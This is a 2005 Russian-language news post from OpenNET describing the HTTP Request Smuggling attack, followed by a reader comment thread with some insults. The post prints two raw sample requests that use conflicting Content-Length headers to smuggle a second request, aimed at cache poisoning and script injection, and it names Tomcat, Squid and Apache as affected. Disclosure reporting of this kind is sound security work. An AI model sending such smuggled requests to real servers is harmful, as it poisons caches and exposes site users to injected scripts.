The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Новая техника HTTP атак

13.06.2005 22:02

Группа исследователей опубликовала документ описывающий новый вид атаки - "HTTP Request Smuggling" (HRS), направленный на подмену страниц в кеше прокси серверов и обход блокировок контент фильтров и фаерволов.

Идея метода - компоновка нескольких POST/GET запросов в рамках одного HTTP обращения, например: 


1      POST http://SITE/foobar.html HTTP/1.1 
2      Host: SITE 
3      Connection: Keep-Alive  
4      Content-Type: application/x-www-form-urlencoded 
5      Content-Length: 0 
6      Content-Length: 44 
7      [CRLF] 
8      GET /poison.html HTTP/1.1 
9      Host: SITE 
10     Bla: [space after the "Bla:", but no CRLF] 
11     GET http://SITE/page_to_poison.html HTTP/1.1 
12     Host: SITE 
13     Connection: Keep-Alive 
14     [CRLF] 

Пример 2:

1       POST /some_script.jsp HTTP/1.0 
2       Connection: Keep-Alive 
3       Content-Type: application/x-www-form-urlencoded 
4       Content-Length: 9 
5       Content-Length: 204 
6  
7       this=thatPOST /vuln_page.jsp HTTP/1.0 
8       Content-Type: application/x-www-form-urlencoded 
9       Content-Length: 95 
10  
11      param1=value1&data=alert("stealing...

Сообщается, что проблеме подвержены Tomcat, squid (исправлено в Squid-2.5.STABLE9), apache (mod_proxy ?) и т.д.

  1. Главная ссылка к новости (http://www.watchfire.com/resou...)
  2. slashdot.org: HTTP Request Smuggling
  3. SQUID-2005:4 - HTTP Request Smuggling Vulnerabilities
  4. Перевод на русский язык документа "HTTP REQUEST SMUGGLING" (Часть 1)
  5. Перевод на русский язык документа "HTTP REQUEST SMUGGLING" (Часть 2)
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/5619-security
Ключевые слова: security, http
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (10) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, blackpepper (?), 10:00, 14/06/2005 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Вот это ..и т.д... заставляет задуматься
     
  • 1.2, Банзай (??), 11:49, 14/06/2005 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Хорошо сказано: "особенно зашибенный вред возможно причинить, находясь в одной локалке с компрометируемым бекендом".

    Еще круто пробки в серверной выворачивать. Отказ в обслуживании будет называться.

     
     
  • 2.3, Skif (ok), 12:50, 14/06/2005 [^] [^^] [^^^] [ответить]  
    		• +/
    >Хорошо сказано: "особенно зашибенный вред возможно причинить, находясь в одной локалке с
    >компрометируемым бекендом".
    >
    >Еще круто пробки в серверной выворачивать. Отказ в обслуживании будет называться.


    А вам никогда не приходилось закрываться даже от своих? Не приходилось бороться со снифферами в локалке? Менять почти каждую неджелю пароли, потому что народ не дремлет?
    Так что это очень даже актуально. И прикалываться не стоит.
    Потом, некоторые провайдеры нарезают клиентам сетки в 24 бита. И вася пупкин может оказаться в моей "локалке" только потому что пров один.

     
     
  • 3.4, toor99 (ok), 13:57, 14/06/2005 [^] [^^] [^^^] [ответить]  
    		• +/
    А еще бывают data centers. Стойки с хостинговыми серверами. С серверами, поставленными на colocation. И так далее; но он об этом не знает и не догадывается :)
     
  • 3.5, Банзай (??), 02:07, 15/06/2005 [^] [^^] [^^^] [ответить]  
    		• +/
    1. Репутация колокейшена
    2. SSL на все чувствительные соединения - обснифайся весь
    3. Вилкам повыёбываться. Первый пакет нарушителя в "гандоны.лог", последующие в - дыру
    4. О чем вы вообще?! Что за колокейшн, в котором вы не уверены относительно гарантий физического доступа к консоли?! Это осталось только в Трипиздищеве и Северной Корее.
     
     
  • 4.7, Алекс (??), 18:05, 15/06/2005 [^] [^^] [^^^] [ответить]  
    		• +/
    запросы например к squid тоже на ssl?
    вы видимо находитесь в юсе или канаде?  ибо в России дебилов,считающих перечисленные вами меры достаточными и применимыми к постоянному использованию уже давно неосталось
    сударь,вы сильно напоминаете воинствующего дилетанта
     
     
  • 5.9, Банзай (??), 20:04, 23/06/2005 [^] [^^] [^^^] [ответить]  
    		• +/
    squid на колокейшене?

    И что он там делает?

    http://cisco.opennet.ru/openforum/vsluhforumID12/434.html

    Вот этого вам не хватает?

    сударь,вы сильно напоминаете хобби-линуксиста из глухого селения.

     
     
  • 6.11, sith (?), 19:34, 29/06/2005 [^] [^^] [^^^] [ответить]  
    		• +/
    squid на колокейшене может выполнять, например, функции ускорителя и балансировшика нагрузки; а вы, кстати, сильно напоминаете мудака.
     
  • 6.12, guest (??), 02:09, 30/07/2005 [^] [^^] [^^^] [ответить]  
    		• +/
    squid-cache.org , google.com помогут Вам найти ответ на этот вопрос.
     

  • 1.8, t0ly (?), 13:02, 16/06/2005 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    нравятся мне ваши дебаты... кратко, локонично, и без флуда что самое главное =)
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру